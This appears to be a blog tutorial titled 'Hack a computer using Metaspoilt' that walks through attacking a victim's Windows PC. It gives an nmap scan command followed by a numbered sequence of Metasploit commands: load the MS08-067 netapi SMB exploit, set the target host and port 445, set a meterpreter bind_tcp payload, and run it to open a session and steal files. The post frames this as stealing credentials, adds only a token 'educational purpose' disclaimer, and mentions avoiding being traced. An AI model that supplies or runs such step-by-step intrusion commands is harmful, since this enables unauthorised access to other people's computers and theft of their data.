Hack a computer using Metaspoilt
Hello everyone! I am here again with a new post and this time it is about how to hack a computer using metaspoilt. So what exactly is metaspoilt? Metaspoit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.
Here I will give a general description on how it works and to use it efficiently to hack into a PC and steal credentials.
So here it goes….
1. Metasploit (Available at metasploit.org)
2. Nmap (Port scanner available at nmap.org)
3. Debian Linux OS (Learn more about it)
4. IP of the victim’s computer.
Introduction to attack:
Nmap is a port scanner used to scan a computer to locate the open ports. The ports are the path for the information that we need to steal. For a normal computer usually 30-40 ports are kept open.To find the number of ports open on your computer open command prompt (Start>Command prompt) and type
netstat -ano and hit enter, you will get a list of open ports in your computer. You need to have a basic knowledge on ports and port numbers to perform this attack.
Using a tool such as Metasploit we can spoof into the PC and steal the information from the corresponding port using commands. Learn to use Metasploit at http://www.metasploit.com/learn-more/how-do-i-use-it/.
Step 1: At first we are going to port scan the computer. For this we need to open Nmap and type the following command– nmap -sS -O
In the place ofip> you have to write the victims ip address. If you see the ports 139 and 445 open then you can go ahead.
Step 2: Now we have to open Metasploit (via terminal) and run it. Type the following command to get the exploits in the victim’s computer- show exploits
You will get a list of exploits in the victim’s computer. which looks similar to “ms05_039_pnp”. Every such exploit correspond to different function. We are interested in an exploit which looks like this “ms08_067_netapi”. So we give a command as shown- use windows/smb/ms08_067_netapi
Step 3: Now we use RHOST command to set the target ip– set RHOST
Step 4: And RPORT command to access port 445- set RPORT 445
Step 5: And now we give a command as- set SMBPIPE SRVSVC
Step 6: And then- set TARGET 0
Step 7: Now we got to set the payload hence the following command- set PAYLOAD windows/meterpreter/bind_tcp
Step 6: Time for the BIG BANG…! Type “exploit” (without quotes) and hit enter.
If you find the message which looks closer to “Meterpeter session 1 opened” then congratulations my friend, it’s done! You have successfully hacked the computer. By using different commands we can steal the files on that system.
All this is for educational purpose only. Harm the victim’s computer at your own risk.
NOTE:- The hacker can be traceable and hence additional techniques are required to make yourself safe!